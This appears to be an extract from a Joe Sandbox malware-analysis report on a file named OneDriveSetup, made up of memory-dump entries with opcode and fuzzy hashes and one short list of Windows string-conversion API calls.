                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 35480258675c058dcaaf4131678c36b56a81dabef5b62959204a35cbac01b327
                                                                                                                                                                        • Instruction ID: a388bacafe47e98b8efad567af44874739f4e46735e84de55a045e2c937b30a6
                                                                                                                                                                        • Opcode Fuzzy Hash: 35480258675c058dcaaf4131678c36b56a81dabef5b62959204a35cbac01b327
                                                                                                                                                                        • Instruction Fuzzy Hash: 75827D74A01219DFDF16CF68C584AAEBBB2FF88311F158559E805DB3A1D730E981CB91

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: ed278707fe94f524ee1241e8df388bb50a3ce7a7901639f192eaa74776862aac
                                                                                                                                                                        • Instruction ID: d1d0843acb167a2216bc92699c227dad9c765070928a7f3da8d503481fdcc305
                                                                                                                                                                        • Opcode Fuzzy Hash: ed278707fe94f524ee1241e8df388bb50a3ce7a7901639f192eaa74776862aac
                                                                                                                                                                        • Instruction Fuzzy Hash: 4172BC74E012688FDB64DF69C980BDDBBB2BB49300F5481EAD949A7351DB309E81CF41
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 571f34853749c75d7c54aa95e4051b2dd78229e18e66cb0d2cd5f1bb7ef725cd
                                                                                                                                                                        • Instruction ID: 1a3510f48bd1c1a8c54400011b84957b3fc93406eead215cbddf4aafe11f250b
                                                                                                                                                                        • Opcode Fuzzy Hash: 571f34853749c75d7c54aa95e4051b2dd78229e18e66cb0d2cd5f1bb7ef725cd
                                                                                                                                                                        • Instruction Fuzzy Hash: 8F125C74A002199FEF14DFA9C894AAEBBF6FF88301F148569E405DB395DB349942CB90
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 7a99f3fb762d7c2479c6440f30913e27d687c981caa636735cabb20a97a5b5cc
                                                                                                                                                                        • Instruction ID: 45cd466da54f24dd289183e7469df05f26ad4f28dd54e9dc2f251e118e5d647c
                                                                                                                                                                        • Opcode Fuzzy Hash: 7a99f3fb762d7c2479c6440f30913e27d687c981caa636735cabb20a97a5b5cc
                                                                                                                                                                        • Instruction Fuzzy Hash: 17223B30A00219DFEF14DF6DD884AADBBF2FF88312F1584AAE415AB265DB31D945CB50
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0ef479c5968e3f8f7ee56b14f78eddd49118913e5f9d8eb7d3b46201d7329cf8
                                                                                                                                                                        • Instruction ID: dad22f3b03964ea7bf61ddbd023d01f87967c0362e7103a613a05f02d24d8ed3
                                                                                                                                                                        • Opcode Fuzzy Hash: 0ef479c5968e3f8f7ee56b14f78eddd49118913e5f9d8eb7d3b46201d7329cf8
                                                                                                                                                                        • Instruction Fuzzy Hash: B8F1A974A052489FEF18DFB5D4945AEBBB2FF89301B15846DE406EB384DF359802CB51
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 2fac49fced2e00eac9f47a6a99e9ce1ff0b7b4530f8711fba0d5e5857a79beb6
                                                                                                                                                                        • Instruction ID: 5f84ae63e1c8d74ddceac289d5702c36266aaa06cc9554dd0da28f9235cb495e
                                                                                                                                                                        • Opcode Fuzzy Hash: 2fac49fced2e00eac9f47a6a99e9ce1ff0b7b4530f8711fba0d5e5857a79beb6
                                                                                                                                                                        • Instruction Fuzzy Hash: 83E1E875E40218DFEF14CFA9C984A9DBBB1BF88311F5590A9E819AB361DB31AC41CF50
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b8aafa79a8feeacfcd14e6e8baae07bc367ade4301082991e0b423cd2c47e3c7
                                                                                                                                                                        • Instruction ID: e32f6869f0d36f9b82d42b1c52d53de40bc55b68ae07fbc5c050e0f86a968c28
                                                                                                                                                                        • Opcode Fuzzy Hash: b8aafa79a8feeacfcd14e6e8baae07bc367ade4301082991e0b423cd2c47e3c7
                                                                                                                                                                        • Instruction Fuzzy Hash: F6C1B174E01218CFDB14DFA5C984B9DBBB2BF89300F6081AAD809AB354DB359E85CF51
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b656d6897a09d79abf03a270c137141d6f49ecad6dbd5cbb5bb3320d94b38e71
                                                                                                                                                                        • Instruction ID: 51ad5e944359f795798eaf1fb9787dfc462b83721ff7fd338efc84b20cf025b4
                                                                                                                                                                        • Opcode Fuzzy Hash: b656d6897a09d79abf03a270c137141d6f49ecad6dbd5cbb5bb3320d94b38e71
                                                                                                                                                                        • Instruction Fuzzy Hash: 1AC1A178E01218CFDB14DFA5C994B9DBBB2BF88301F6081A9D809A7395DB359E81CF11
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 562d73ed61f8a8634dd27c0b9b84513dac45641bc01f455c2e5391ece6846531
                                                                                                                                                                        • Instruction ID: 933b9f58479eeb61f0b6828f0a80557ae751037f05b6ca8d551650f6acb1f044
                                                                                                                                                                        • Opcode Fuzzy Hash: 562d73ed61f8a8634dd27c0b9b84513dac45641bc01f455c2e5391ece6846531
                                                                                                                                                                        • Instruction Fuzzy Hash: BFC1D378E01218CFDB14DFA5C984B9DBBB2BF88300F5081AAD809AB355DB359E85CF51
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 261fa9385846521c32990ccf556e107246b4919e0abfedfe48630e872529306b
                                                                                                                                                                        • Instruction ID: abf45d26988a69071a80c9c3f7ac40a4cc3daa7c5adb975e1e4094e04f4f88a7
                                                                                                                                                                        • Opcode Fuzzy Hash: 261fa9385846521c32990ccf556e107246b4919e0abfedfe48630e872529306b
                                                                                                                                                                        • Instruction Fuzzy Hash: 34A1F574E00208CFEB24DFA9C944B9DBBB1FF88301F20826AE449A7395DB759985CF55
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: ec3f604a70e8c0e031f0ac8746a63c95c84e456c8f680e6cc30ca1550c905cc7
                                                                                                                                                                        • Instruction ID: 46ebe324fcf8fe51cb54066014c79ba15b0bb90512a7877ee3a23434d6a34e06
                                                                                                                                                                        • Opcode Fuzzy Hash: ec3f604a70e8c0e031f0ac8746a63c95c84e456c8f680e6cc30ca1550c905cc7
                                                                                                                                                                        • Instruction Fuzzy Hash: C3A1F470E00208CFEB24DFA9C944B9DBBB1FF89305F20826AE449A7391DB759985CF55
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a9f20416e94766f5914e28df7eb2937242852675454516de81891ef74a3f9701
                                                                                                                                                                        • Instruction ID: 82cb75f7098504d934495444c650ce250c76bc0b6b77ba3d4c67c12d61431b38
                                                                                                                                                                        • Opcode Fuzzy Hash: a9f20416e94766f5914e28df7eb2937242852675454516de81891ef74a3f9701
                                                                                                                                                                        • Instruction Fuzzy Hash: 50A1B674E01218CFEB64CF6AD944B9DBBF2BF89300F14C1AAD448A7254DB745A85CF11
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 6788aa4291f3580092f9ccb1ec07d43078f07a3ba9081ab41dd5281eb141b148
                                                                                                                                                                        • Instruction ID: 6066fad45766a706765fd6d3a4ab355e64a5ca2db2f74e9392da6945c6baf13e
                                                                                                                                                                        • Opcode Fuzzy Hash: 6788aa4291f3580092f9ccb1ec07d43078f07a3ba9081ab41dd5281eb141b148
                                                                                                                                                                        • Instruction Fuzzy Hash: 79A1A575E01218CFEB64CF6AD944B9EBBF2BF88300F14C1AAD948A7250D7745A85CF11
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 3882c5373837b3df8810ba3acc86a7f77d374127cac9700f52e2d60cc8bbfc06
                                                                                                                                                                        • Instruction ID: 589a81dd60610dfa499d247b71bf80d96e8d16ff936e5054361d1f197d39c1ba
                                                                                                                                                                        • Opcode Fuzzy Hash: 3882c5373837b3df8810ba3acc86a7f77d374127cac9700f52e2d60cc8bbfc06
                                                                                                                                                                        • Instruction Fuzzy Hash: 5591E274E00258CFEF54DFAAC884A9DBBF2BF89311F148069D819AB365DB709946CF11
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 7e943bb5897246b1ecb6daf6c4a26402e330392ca91986c47edb4a1ef9c166b8
                                                                                                                                                                        • Instruction ID: 4ee6b3866895c1046b3782a6396a5d26a72a1360176624b020814fe9e2db9a69
                                                                                                                                                                        • Opcode Fuzzy Hash: 7e943bb5897246b1ecb6daf6c4a26402e330392ca91986c47edb4a1ef9c166b8
                                                                                                                                                                        • Instruction Fuzzy Hash: BF91E574E00218CFEB10DFA8D944B9DBBB1FF89311F20825AE849A73A1DB759985CF54
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 8c3ac654e6470668da8ff79903740991671fe96637303ddc2e3898b52fb00c50
                                                                                                                                                                        • Instruction ID: 68534ff3cabe35ff52cb6588d28ba560b3e2cb925c95f1e104558705afe32c3a
                                                                                                                                                                        • Opcode Fuzzy Hash: 8c3ac654e6470668da8ff79903740991671fe96637303ddc2e3898b52fb00c50
                                                                                                                                                                        • Instruction Fuzzy Hash: FF91C274E00208CFEB14DFA9D984A9DBBF2FF88311F14806AD819AB365EB305945CF51
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 94c394ac844bea7cc96ce43806bbac6851adea82633419a86789669ebe322538
                                                                                                                                                                        • Instruction ID: 5ae292325fff291c77fc0f2f12b8b0a77f9fa6821d73475ab718feae25fb34f8
                                                                                                                                                                        • Opcode Fuzzy Hash: 94c394ac844bea7cc96ce43806bbac6851adea82633419a86789669ebe322538
                                                                                                                                                                        • Instruction Fuzzy Hash: FB81B174E40218CFEB14DFAAC884A9DBBF2FF88311F148069D419AB365DB355945CF51
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d2e6516dd32e06ba4b1f0c219b8822bb794a8fb5a060a056c709f0d61203ead8
                                                                                                                                                                        • Instruction ID: 97b5b39474ba7a1a7fdc753b0ca6cc200c1e904151b33704e9951c9132b48cd3
                                                                                                                                                                        • Opcode Fuzzy Hash: d2e6516dd32e06ba4b1f0c219b8822bb794a8fb5a060a056c709f0d61203ead8
                                                                                                                                                                        • Instruction Fuzzy Hash: C681B074E00218CFEB14DFAAD984A9DBBF2BF88301F14806AD819AB365DB319C45CF50
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 4d427ed08b5be4c49e975a510ebbc898b6cffb2bfc32b0321d9653b32b51ddd3
                                                                                                                                                                        • Instruction ID: d07f7071ada103dd09b01982cb0c5ac6506d48e2803c71b26c2f4198a36e6a05
                                                                                                                                                                        • Opcode Fuzzy Hash: 4d427ed08b5be4c49e975a510ebbc898b6cffb2bfc32b0321d9653b32b51ddd3
                                                                                                                                                                        • Instruction Fuzzy Hash: C6819274E00218DFEB14DFAAD984A9DBBF2BF88311F148069D819AB365DB349946CF50
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 5f9d40404f89b637944c56c24db16599560d6fd3d0d4b88171c6d6236b10a944
                                                                                                                                                                        • Instruction ID: 726f9c5f6ebe88c7b1c6ed8d511f1b2d282df33976b8891e13f518ca91a996b8
                                                                                                                                                                        • Opcode Fuzzy Hash: 5f9d40404f89b637944c56c24db16599560d6fd3d0d4b88171c6d6236b10a944
                                                                                                                                                                        • Instruction Fuzzy Hash: F881A174E00218CFEF18DFAAD984A9DBBF2BF88311F548069E819AB365DB345945CF10
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: db8492cfde5a61c12376785f340eac500be07514072dc083bb281d9145eb1fde
                                                                                                                                                                        • Instruction ID: 99b816389acdd00b166bc354d20f5b0b73af9dbc0ab73c209ca4f1c43b0c4d87
                                                                                                                                                                        • Opcode Fuzzy Hash: db8492cfde5a61c12376785f340eac500be07514072dc083bb281d9145eb1fde
                                                                                                                                                                        • Instruction Fuzzy Hash: AF71B675E01218CFDB64CF66D984BDDBBB2BF89301F1491AAD808A7354D7355A82CF41
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 20f0dee3298123cf47cf38313159038ab979ef786be2d30b82a764299cf9cf49
                                                                                                                                                                        • Instruction ID: 191354a747dd47e5d770f14251dccf33bf3770d7256bfd5e8d9b69bb512be1c1
                                                                                                                                                                        • Opcode Fuzzy Hash: 20f0dee3298123cf47cf38313159038ab979ef786be2d30b82a764299cf9cf49
                                                                                                                                                                        • Instruction Fuzzy Hash: 4D81A675E01618CFEB68CF6AC944B9EBBF2BF88300F14C1AAD548A7254DB744A85CF11
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d953a29846bb1178e4bc523d5cec288e137c74ef3d9648dafdd951cc03db97f6
                                                                                                                                                                        • Instruction ID: df349e9e783ece75b67f883e96fd911513b88181cea181bff5bda4b8ded72bec
                                                                                                                                                                        • Opcode Fuzzy Hash: d953a29846bb1178e4bc523d5cec288e137c74ef3d9648dafdd951cc03db97f6
                                                                                                                                                                        • Instruction Fuzzy Hash: FC61B274E002489FEF18DFAAD984A9DBBF2BF88301F149069D419AB365EB355846CF11
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 007ab2703b158db44fb12010473d4fa829dcbd4794f0b2272024dd7bc4fbfcf1
                                                                                                                                                                        • Instruction ID: b7f9da3f3ef7dc4e709698612fa2651706c2cfe1be56f690aeedc0eecff19e43
                                                                                                                                                                        • Opcode Fuzzy Hash: 007ab2703b158db44fb12010473d4fa829dcbd4794f0b2272024dd7bc4fbfcf1
                                                                                                                                                                        • Instruction Fuzzy Hash: 5B51C774E00208DFEB18DFAAD494A9DFBB2FF89701F208069E815AB365DB315842DF51
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 39009e2f54514dede99cc1a2fb1082f2adf2039a1cbc68cdb4205822f8013fb5
                                                                                                                                                                        • Instruction ID: 0fc2de50c1c01df2b0b6a846d4a9578eab0db434b349f7b5e781584d8924597a
                                                                                                                                                                        • Opcode Fuzzy Hash: 39009e2f54514dede99cc1a2fb1082f2adf2039a1cbc68cdb4205822f8013fb5
                                                                                                                                                                        • Instruction Fuzzy Hash: 30519474E00308DFEB18DFAAD894A9DFBB2BF89701F209029E815AB365DB315841DF51
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 2ccc80f295ccb91fc8de8eec1c235a0af4fb00b390604e4e5cfde19a80541392
                                                                                                                                                                        • Instruction ID: 3e5318b89b4971f710cd8ff43a3a17379f600e683c7f89d4eb43b85a4e5dafa2
                                                                                                                                                                        • Opcode Fuzzy Hash: 2ccc80f295ccb91fc8de8eec1c235a0af4fb00b390604e4e5cfde19a80541392
                                                                                                                                                                        • Instruction Fuzzy Hash: F1417AB1E016198BEB68CF5BDD4479EFAF3AFC9200F14C1AAC50CA6254DB750A868F51
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 7b191bc43baccd566a20cd16f57b5521f86187376dbfefa6aca949f7c5ab19c5
                                                                                                                                                                        • Instruction ID: 32df3ae30a5cfacd1f691e06e562439e2fd3963163672d1014c073228bed2375
                                                                                                                                                                        • Opcode Fuzzy Hash: 7b191bc43baccd566a20cd16f57b5521f86187376dbfefa6aca949f7c5ab19c5
                                                                                                                                                                        • Instruction Fuzzy Hash: E741D8B4E01248CBDB18DFAAC5506DEBBF2BF89300F64D12AC815BB254DB344946CF54
Memory Dump Source
• Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4339c688fa319d8780f60fe842501c63b57af2bc77dec30cc435fce48c1b493a
• Instruction ID: db34aaa2ce204662becfc9f74fa50234ad940c5a84b3f8b9ca811f0e6878667c
• Opcode Fuzzy Hash: 4339c688fa319d8780f60fe842501c63b57af2bc77dec30cc435fce48c1b493a
• Instruction Fuzzy Hash: 1E41B475E01248CBDB18DFA6D954B9DBBB2BF89300F60812AC819BB254DB355946CF50
Memory Dump Source
• Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 38fcc5a529943a319f77e5ab9aa661dd9ca630bb5fafc7fa00723448f19c2eeb
• Instruction ID: 08a44b4fd96a8c1e689962a52a52cde643e7becf7bd322220bd28152e3310d2f
• Opcode Fuzzy Hash: 38fcc5a529943a319f77e5ab9aa661dd9ca630bb5fafc7fa00723448f19c2eeb
• Instruction Fuzzy Hash: ED41C574E01248CBDB18CFAAD554A9EBBF2BF89300F24C12AD819BB354DB355946CF50

Control-flow Graph: function starting at 4018f0 (graph image not rendered in this extract)
APIs
• lstrlenA.KERNEL32(?), ref: 00401906
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
• GetLastError.KERNEL32 ref: 00401940
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
Memory Dump Source
• Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$ErrorLastlstrlen
• String ID:
• API String ID: 3322701435-0
• Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
• Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
• Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
• Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

